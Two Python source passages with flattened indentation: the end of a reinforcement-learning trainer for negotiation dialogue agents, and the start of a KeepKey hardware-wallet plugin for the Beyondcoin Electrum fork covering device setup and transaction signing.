self.writer.add_scalar('agent{}/dev_reward'.format(j), all_rewards[j], ii)
def dump_examples(self, examples, verbose_strs, epoch, mode='train', other_path=None):
# Dump with details
args = self.args
if other_path is None:
path = args.model_path
else:
path = other_path
path_txt = '{root}/{model}_{mode}_example{epoch}.txt'.format(
root=path,
model=args.name,
mode=mode,
epoch=epoch)
path_pkl = '{root}/{model}_{mode}_example{epoch}.pkl'.format(
root=path,
model=args.name,
mode=mode,
epoch=epoch)
print('Save examples at {} and {}.'.format(path_txt, path_pkl))
with open(path_txt, 'w') as f:
for ex in verbose_strs:
f.write('-' * 7 + '\n')
for s in ex:
f.write(s + '\n')
with open(path_pkl, 'wb') as f:
pkl.dump(examples, f)
def evaluate(self):
num_worker = self.update_worker_list()
worker = self.worker_conn[0]
args = self.args
sample_size = args.batch_size
max_epoch = args.epochs
last_time = time.time()
if args.debug:
sample_size = 2
eval_dict = {}
separate_edict = [{} for _ in range(10)]
# add dd to d
def update_edict(d, dd):
for k in dd:
if d.get(k) is None:
d[k] = []
d[k] = d[k] + dd[k]
def get_result_dict(d):
ret = {}
if d.get('reward') is None:
num = 0
else:
num = len(d.get('reward'))
for k in d:
ret[k] = np.mean(d[k])
ret[k+'_std'] = np.std(d[k])
return ret, num
for epoch in range(max_epoch):
last_time = time.time()
info = worker.local_send(['trainset_valid', (epoch, sample_size, sample_size)])
_batch_iters, batch_info, example, v_str = info[1]
_rewards, strategies = batch_info
data_pkl = 'cache/{}/data_{}.pkl'.format(args.name, epoch)
with open(data_pkl, 'wb') as f:
pkl.dump(info[1], f)
self.dump_examples(example, v_str, epoch, other_path='logs/'+args.name)
info = worker.local_send(['get_eval_dict', (example, strategies[1])])
ed, sed = info[1]
# log eval table as json file
eval_json = 'logs/{}/eval_{}.json'.format(args.name, epoch)
update_edict(eval_dict, ed)
tmpd, _ = get_result_dict(eval_dict)
tmpd['number'] = (epoch+1) * sample_size
with open(eval_json, 'w') as f:
json.dump(tmpd, f)
print('=' * 5 + ' [reward: {:.3f}\t utility: {:.3f}\t success_rate: {:.3f}]'.
format(tmpd['reward'], tmpd['utility'], tmpd["success_rate"]))
eval_json = 'logs/{}/eval_separate_{}.json'.format(args.name, epoch)
tmpds = []
for i in range(len(sed)):
update_edict(separate_edict[i], sed[i])
tmpd, num = get_result_dict(separate_edict[i])
tmpd['number'] = num
tmpd['strategy'] = i
tmpds.append(tmpd)
with open(eval_json, 'w') as f:
json.dump(tmpds, f)
print('=' * 5 + ' [Epoch {}/{}, {} dialogues for {:.3f}s.]'.
format(epoch + 1, max_epoch, (epoch+1)*sample_size, time.time() - last_time))
def learn_identity(self):
args = self.args
save_every = 100
batch_size = 100
split_results = False
if args.only_run:
batch_size = 1
# if args.tom_model == 'id':
# learn_type = 'identity'
# elif args.tom_model in ['history', 'naive']:
# learn_type = 'tom'
# else:# == 'idtom'
# learn_type = 'co-train'
if args.tom_model in ['id', 'uttr_id']:
update_table = {'id': True, 'tom': False}
ret_table = {'id': True, 'tom': False}
elif args.tom_model in ['uttr_fid_history_tom']:
update_table = {'id': False, 'tom': True}
ret_table = {'id': True, 'tom': True}
elif args.tom_model in ['uttr_id_history_tom', 'id_tom', 'id_history_tom']:
update_table = {'id': True, 'tom': True}
ret_table = {'id': True, 'tom': True}
elif args.tom_model in ['fixed_id_tom', 'fixed_id_history_tom']:
update_table = {'id': False, 'tom': True}
ret_table = {'id': True, 'tom': True}
elif args.tom_model in ['history', 'naive']:
update_table = {'id': False, 'tom': True}
ret_table = {'id': False, 'tom': True}
else:
raise NameError('unknown learn_type ')
if args.fix_id:
update_table['id'] = False
if args.only_run:
update_table = {'id': False, 'tom': False}
num_worker = self.update_worker_list()
worker = self.worker_conn[0]
train_agent = 0
load_data = args.load_sample
# Generate data samples or load from files
data_pkl = 'cache/{}/data.pkl'.format(args.name)
if load_data is None:
print('[Info] Start sampling.')
info = worker.send(['simulate', train_agent, args.num_dialogues, args.num_dialogues])
with open(data_pkl, 'wb') as f:
pkl.dump(pkl.loads(info[1]), f)
_batch_iters, batch_info, example, v_str = pkl.loads(info[1])
else:
print('[Info] Load sample from {}'.format(load_data))
info = ['done', None]
with open(load_data, 'rb') as f:
info[1] = pkl.load(f)
_batch_iters, batch_info, example, v_str = info[1]
_rewards, strategies = batch_info
# Single Thread!
if args.strategy_in_words:
worker.local_send(
['add_strategy_in_language', (_batch_iters, strategies)]
)
self.dump_examples(example, v_str, 0)
# Divide the training set
train_size = round(len(_batch_iters[1-train_agent]) * 0.6)
train_batch = _batch_iters[1-train_agent][:train_size]
train_strategy = strategies[1-train_agent][:train_size]
dev_batch = _batch_iters[1-train_agent][train_size:]
dev_strategy = strategies[1-train_agent][train_size:]
# if not, only learn identifier
if args.tom_model != 'id' and split_results:
dev_batches = [[], []]
dev_strategies = [[], []]
for i, s in enumerate(dev_strategy):
dev_batches[s].append(dev_batch[i])
dev_strategies[s].append(s)
dev_batch = dev_batches
dev_strategy = dev_strategies
dev_writer = [SummaryWriter(logdir='logs/{}/strategy_{}'.format(args.name, i)) for i in range(2)]
print('[Info] Start training model.')
step_range = 10
step_writer = [SummaryWriter(logdir='logs/{}/step_{}'.format(args.name, i)) for i in range(step_range)]
# split training batch
_, train_batch_splited = worker.local_send(
['split_batch', (train_batch, 1024)])
if args.tom_model != 'id' and split_results:
dev_batch_splited = [None, None]
_, dev_batch_splited[0] = worker.local_send(
['split_batch', (dev_batch[0], 1024)]
)
_, dev_batch_splited[1] = worker.local_send(
['split_batch', (dev_batch[1], 1024)]
)
else:
_, dev_batch_splited = worker.local_send(
['split_batch', (dev_batch, 1024)]
)
def draw_dev_info(loss, accu, step_info, name, w, i):
if ret_table['id']:
w.add_scalar('identity{}/{}_loss'.format(train_agent, name), loss[0], i)
w.add_scalar('identity{}/{}_accuracy'.format(train_agent, name), accu[0], i)
w.add_scalar('identity{}/{}_accuracy2'.format(train_agent, name), accu[2], i)
if ret_table['tom']:
w.add_scalar('tom{}/{}_intent_loss'.format(train_agent, name), loss[1], i)
w.add_scalar('tom{}/{}_intent_accuracy'.format(train_agent, name), accu[1], i)
w.add_scalar('tom{}/{}_price_loss'.format(train_agent, name), loss[2], i)
w.add_scalar('tom{}/{}_total_loss'.format(train_agent, name), loss[1] + loss[2], i)
w.flush()
# Draw outputs on the tensorboard
def draw_info(loss, accu, step_info, name, i):
draw_dev_info(loss, accu, None, name, self.writer, i)
for j, w in enumerate(step_writer):
if j >= len(step_info[2]):
break
if math.isnan(step_info[2][j]) or step_info[2][j] == 0:
continue
if ret_table['id']:
w.add_scalar('identity{}/{}_loss'.format(train_agent, name), step_info[0][0][j], i)
w.add_scalar('identity{}/{}_accuracy'.format(train_agent, name), step_info[1][0][j], i)
w.add_scalar('identity{}/{}_accuracy2'.format(train_agent, name), step_info[1][2][j], i)
if ret_table['tom']:
w.add_scalar('tom{}/{}_intent_loss'.format(train_agent, name), step_info[0][1][j], i)
w.add_scalar('tom{}/{}_intent_accuracy'.format(train_agent, name), step_info[1][1][j], i)
w.add_scalar('tom{}/{}_price_loss'.format(train_agent, name), step_info[0][2][j], i)
w.flush()
# train model
cur_t = time.time()
for i in range(args.epochs):
# print('train.send:')
info = worker.local_send(
['train_tom', (train_agent, train_batch_splited,
train_strategy, update_table, ret_table,
'cache/{}/train_pred_{}.pkl'.format(args.name, i))])
train_loss, train_accu, train_step_info = info[1]
if args.only_run:
save_dir = 'logs/{}/hidden_vec_{}.pkl'.format(args.name, i)
total_num = 0
for j in range(len(worker.trainer.hidden_vec)):
assert worker.trainer.hidden_vec[j].shape[0] == worker.trainer.hidden_stra[j].shape[0], \
"miss match at {}, {} of {}".format(worker.trainer.hidden_vec[j].shape, worker.trainer.hidden_stra[j].shape, j)
total_num = total_num + len(worker.trainer.hidden_stra[j])
with open(save_dir, "wb") as f:
pkl.dump([worker.trainer.hidden_vec, worker.trainer.hidden_stra], f)
print("accu:", train_accu)
print('[run{}/{}]\t num:{} \t time:{:.2f}s.'.format(i+1, args.epochs, total_num, time.time()-cur_t))
continue
draw_info(train_loss, train_accu, train_step_info, 'train', i)
# print('[DEBUG] {} time {}s.'.format('train', time.time()-cur_t))
# cur_t = time.time()
# info = worker.send(
# ['train_tom', pkl.dumps((train_agent, train_batch,
# train_strategy, 'cache/{}/train_pred_{}.pkl'.format(args.name, i)))])
# train_loss, train_step_info = pkl.loads(info[1])
# info = worker.send(
# ['valid_tom', pkl.dumps((train_agent, dev_batch,
# dev_strategy, 'cache/{}/dev_pred_{}.pkl'.format(args.name, i)))])
# dev_loss, dev_step_info = pkl.loads(info[1])
if args.tom_model != 'id' and split_results:
# divide by 2 different id
dev_loss = [0]*3
dev_accu = [0]*2
for j in range(2):
ratio = len(dev_strategy[j]) / (len(dev_strategy[0]) + len(dev_strategy[1]))
info = worker.local_send(
['valid_tom', (train_agent, dev_batch_splited[j],
dev_strategy[j], update_table, ret_table,
'cache/{}/dev{}_pred_{}.pkl'.format(args.name, j, i))])
tmp_loss, tmp_accu, dev_step_info = info[1]
for x in range(3):
if isinstance(tmp_loss[x], float):
dev_loss[x] += ratio * tmp_loss[x]
else:
if tmp_loss[x] != [] and tmp_loss[x] is not None:
print(tmp_loss[x])
dev_loss[x] = None
for x in range(2):
if isinstance(tmp_accu[x], float):
dev_accu[x] += ratio * tmp_accu[x]
else:
if tmp_accu[x] != [] and tmp_accu[x] is not None:
print(tmp_accu[x])
dev_loss[x] = None
draw_dev_info(tmp_loss, tmp_accu, dev_step_info, 'dev', dev_writer[j], i)
draw_dev_info(dev_loss, dev_accu, None, 'dev', self.writer, i)
else:
info = worker.local_send(
['valid_tom', (train_agent, dev_batch_splited,
dev_strategy, update_table, ret_table,
'cache/{}/dev_pred_{}.pkl'.format(args.name, i))])
dev_loss, dev_accu, dev_step_info = info[1]
# draw_info(dev_loss, dev_accu, dev_step_info, 'dev', i)
# draw_dev_info(dev_loss, dev_accu, None, 'dev', self.writer, i)
draw_info(dev_loss, dev_accu, dev_step_info, 'dev', i)
# print('[DEBUG] {} time {}s.'.format('valid', time.time() - cur_t))
# cur_t = time.time()
if i == 0:
print('train_step_info:', train_step_info[2])
# print('dev_step_info:', dev_step_info[2])
print('[train{}/{}]\t time:{:.2f}s.'.format(i+1, args.epochs, time.time()-cur_t))
cur_t = time.time()
if update_table['id']:
print('\t<identity> train loss{:.5f} accu{:.5f}, valid loss{:.5f} accu{:.5f}, '
.format(train_loss[0], train_accu[0], dev_loss[0], dev_accu[0]))
if update_table['tom']:
print('\t<tom> train ploss{:.5f} accu{:.5f}, valid ploss{:.5f} accu{:.5f}, '.
format(train_loss[2], train_accu[1], dev_loss[2], dev_accu[1]))
# print('\t<tom> train_loss:{:.5f}, valid_loss:{:.5f}, ')
# print('[info] train{}/{} train_loss:{:.5f}, valid_loss:{:.5f}, time:{:.2f}s.'
# .format(i+1, args.epochs, train_loss, dev_loss, time.time()-cur_t))
# print('[DEBUG] {} time {}s.'.format('tfboard', time.time() - cur_t))
# cur_t = time.time()
# Save models
if not update_table['tom']:
# When only update id
score = dev_accu[0]
score_type = 'accu'
else:
score = dev_loss[2]
score_type = 'loss'
if (i+1)%30 == 0:
# Only update best model
worker.local_send(['save_best_model', (i, score, score_type, True)])
# print('[DEBUG] {} time {}s.'.format('dump_model', time.time() - cur_t))
# cur_t = time.time()
elif (i+1)%100 == 0:
worker.local_send(['save_best_model', (i, score, score_type, False)])
# print('[DEBUG] {} time {}s.'.format('dump_model', time.time() - cur_t))
# cur_t = time.time()
def _log_policy(self, examples, dump_result):
policies = [{
'i_policy': [], 'p_policy': []
}, {
'i_policy': [], 'p_policy': []
}]
for ex in examples:
for e in ex.events:
i = e.agent
odata = e.metadata['output_data']
policies[i]['i_policy'].append(odata['policy'].reshape(1, -1))
if odata.get('p_policy') is not None:
policies[i]['p_policy'].append(odata['p_policy'].reshape(1, -1))
for i in range(2):
for k in policies[i]:
if len(policies[i][k]) > 0:
policies[i][k] = torch.cat(policies[i][k], dim=0).mean(dim=0, keepdim=True)
if self.policies_log[i].get(k) is None:
self.policies_log[i][k] = []
self.policies_log[i][k].append(policies[i][k])
if dump_result:
logger = logging.getLogger('agent{}_plog_{}'.format(i, k))
tmp = torch.cat(self.policies_log[i][k], dim=0).mean(dim=0)
# tensor([x, x, x])
logger.info(str(tmp.data)[8:-2].replace(" ", "").replace("\n", ""))
def _init_policy_logfiles(self, logdir):
formatter = logging.Formatter('%(message)s')
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.DEBUG)
# stream_handler.setFormatter(formatter)
# logger.addHandler(stream_handler)
for i in range(2):
for name in ['i_policy', 'p_policy']:
file_handler = logging.FileHandler(os.path.join(logdir, 'agent{}_plog_{}.log'.format(i, name)))
file_handler.setLevel(level=logging.INFO)
file_handler.setFormatter(formatter)
logger = logging.getLogger('agent{}_plog_{}'.format(i, name))
logger.setLevel(level=logging.INFO)
logger.addHandler(file_handler)
def learn(self):
args = self.args
rewards = [None] * 2
s_rewards = [None] * 2
critic_report_stats = RLStatistics()
critic_stats = RLStatistics()
last_time = time.time()
tensorboard_every = 1
save_every = 100
history_train_losses = [[], []]
batch_size = 50
pretrain_rounds = 3
if args.only_run:
batch_size = 1
pretrain_rounds = 0
save_every = max(1, save_every // batch_size)
report_every = max(1, args.report_every // batch_size)
num_worker = self.update_worker_list()
worker = self.worker_conn[0]
max_epoch = args.num_dialogues // batch_size
max_epoch = args.epochs
batch_size = args.batch_size
save_every = max(50, max_epoch // 100)
report_every = max(1, max_epoch // 100)
if args.debug:
save_every = 1
device = 'cpu'
if len(args.gpuid) > 0:
device = "cuda:{}".format(args.gpuid[0])
policy_buffer = ReplayBuffer.get_instance('policy')
value_buffer = ReplayBuffer.get_instance('value')
self._init_policy_logfiles('logs/' + args.name)
sample_size = 32
train_size = 128
for epoch in range(max_epoch):
last_time = time.time()
policy_buffer.empty()
# _batch_iters, _rewards, example, _ = self.sample_data(i, batch_size, args)
# print('=' * 5 + ' [Epoch {}/{} running.]'.format(epoch, max_epoch))
tt = time.time()
info = worker.send(['simulate', epoch, sample_size, sample_size])
_batch_iters, batch_info, example, v_str = pkl.loads(info[1])
_rewards, strategies = batch_info
self._log_policy(example, (epoch+1) % save_every == 0)
policy_buffer.add_batch_iters(_batch_iters[0],
add_dict={'reward': _rewards[0], 'strategy': strategies[0]})
value_buffer.add_batch_iters(_batch_iters[0],
add_dict={'reward': _rewards[0], 'strategy': strategies[0]})
# For debug
# print("rewards:", np.mean(_rewards[0]), np.mean(_rewards[1]))
# print("rewards_num:", len(_rewards[0]), len(_rewards[1]))
tt = time.time()
value_update = min(value_buffer.size//train_size, 5)
for i in range(value_update):
batch_iters, _, ret_add = value_buffer.sample_batch(train_size, add_info={'reward'}, to_device=device)
worker.local_send(
['train', (epoch, batch_iters, ret_add['reward'], 'fix_policy')])
batch_iters, _, ret_add = policy_buffer.sample_batch(train_size, add_info={'reward'}, to_device=device)
info = worker.local_send(
['train', (epoch, batch_iters, ret_add['reward'], '')])
loss = info[1]
print('train time:', time.time()-tt)
# Draw outputs on the tensorboard
self._draw_tensorboard((epoch + 1) , [[loss], []],
_rewards)
print('\t<train> reward{:.3f}, {:.3f} pg_loss {:.5f}, value_loss {:.5f}, value_update {}'
.format(np.mean(_rewards[0]), np.mean(_rewards[1]), loss['pg_loss'][0,0], loss['value_loss'][0,0], value_update))
if (epoch+1)%save_every == 0:
self._dump_buffer(value_buffer, epoch+1)
self.dump_examples(example, v_str, epoch, 'train')
valid_info = worker.local_send(['valid', (0, 200)])
valid_stats, example, v_str = valid_info[1]
self.dump_examples(example, v_str, epoch, 'dev')
valid_reward = [vs.mean_reward() for vs in valid_stats]
self._draw_tensorboard_valid((epoch + 1), valid_reward)
print('\t<valid> reward{:.3f}, {:.3f}'.format(valid_reward[0], valid_reward[1]))
worker.local_send(['save_model', (epoch, valid_reward[0], 'reward')])
print('=' * 5 + ' [Epoch {}/{} for {:.3f}s.]'.format(epoch+1, max_epoch, time.time() - last_time))
# # Save model
# if (i + 1) % save_every == 0:
# # TODO: valid in dev set
# valid_stats, _, _ = self.validate(args, 50 if args.only_run else 200)
# if not args.only_run:
# self.drop_checkpoint(args, i + 1, valid_stats,
# model_opt=self.agents[self.training_agent].env.model_args)
# if args.update_oppo:
# self.update_opponent(['policy', 'critic'])
# else:
# print('valid ', valid_stats.str_loss())
def _dump_buffer(self, buffer, epoch, ):
args = self.args
path_pkl = '{root}/{model}_buffer{epoch}.pkl'.format(
root=args.model_path,
model=args.name,
epoch=epoch)
print('Save buffer at {}.'.format(path_pkl))
with open(path_pkl, 'wb') as f:
pkl.dump(buffer, f)
# with open(path_pkl, 'rb') as f:
# bf = pkl.load(f)
def run(self):
# deprecated
# self.run_local_workers()
args = self.args
rewards = [None] * 2
s_rewards = [None] * 2
tensorboard_every = 1
save_every = 50
history_train_losses = [[], []]
batch_size = 100
pretrain_rounds = 3
save_every = max(1, save_every // batch_size)
report_every = max(1, args.report_every // batch_size)
max_epoch = args.num_dialogues // batch_size
epoch = 0
data_size = 0
all_rewards = [[], []]
num_worker = self.update_worker_list()
last_time = time.time()
for epoch in range(args.start_epoch, max_epoch):
batches = []
rewards = [[], []]
task_lists = self.allocate_tasks(num_worker, batch_size)
# Use workers to get trajectories
train_examples = []
train_ex_str = []
for i, w in enumerate(self.worker_conn):
info = w.send(['simulate', epoch, batch_size, task_lists[i]])
if info[0] != 'done':
print('Error on {}: {}.'.format(i, info))
data = pkl.loads(info[1])
batches += data[0]
rewards[0] += data[1][0]
rewards[1] += data[1][1]
train_examples += data[2]
train_ex_str += data[3]
self.dump_examples(train_examples, train_ex_str, epoch)
# For debug
print("rewards:", np.mean(rewards[0]), np.mean(rewards[1]))
print("rewards_num:", len(rewards[0]), len(rewards[1]))
# Train the model
train_info = self.worker_conn[0].send(['train', pkl.dumps((epoch, batches, rewards[0], self.args.train_mode))])
if train_info[0] != 'done':
print('Error on {}: {}.'.format(i, train_info))
# Draw outputs on the tensorboard
self._draw_tensorboard((epoch + 1) * batch_size, [[pkl.loads(train_info[1])], []],
rewards)
# Get new model from trainer
info = self.worker_conn[0].send(['fetch_model', 0])
data = info[1]
# Save local checkpoint
# Update all the worker
for i, w in enumerate(self.worker_conn):
if i == 0:
continue
w.send(['update_model', 0, data])
# for i, w in enumerate(self.worker_conn):
# if i == 0:
# continue
# w.recv()
# Valid new model
task_lists = self.allocate_tasks(num_worker, 50)
now = 0
valid_stats = [RLStatistics(), RLStatistics()]
valid_examples = []
valid_ex_str = []
for i, w in enumerate(self.worker_conn):
valid_info = w.send(['valid', (now, task_lists[i])])
now += task_lists[i]
valid_info[1] = pkl.loads(valid_info[1])
for j in range(2):
valid_stats[j].update(valid_info[1][0][j])
valid_examples += valid_info[1][1]
valid_ex_str += valid_info[1][2]
self.dump_examples(valid_examples, valid_ex_str, epoch, 'dev')
# Save the model
self.worker_conn[0].send(['save_model', pkl.dumps((epoch, valid_stats[0]))])
# self.worker_conn[0].recv()
# Draw dev rewards on tensorboard
dev_rewards = [valid_stats[j].mean_reward() for j in range(2)]
self._draw_tensorboard_valid((epoch + 1) * batch_size, dev_rewards)
print('=' * 5 + ' [Epoch {} for {:.3f}s.]'.format(epoch, time.time() - last_time))
last_time = time.time()
self.quit_all_workers()
self.join_local_workers()
def quit_all_workers(self):
for w in self.worker_conn:
w.send(['quit'])
def join_local_workers(self):
# for w in self.local_workers:
# w.join()
pass
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_bynd.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_bynd.bip32 import BIP32Node
from electrum_bynd import constants
from electrum_bynd.i18n import _
from electrum_bynd.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_bynd.keystore import Hardware_KeyStore
from electrum_bynd.plugin import Device
from electrum_bynd.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Beyondcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
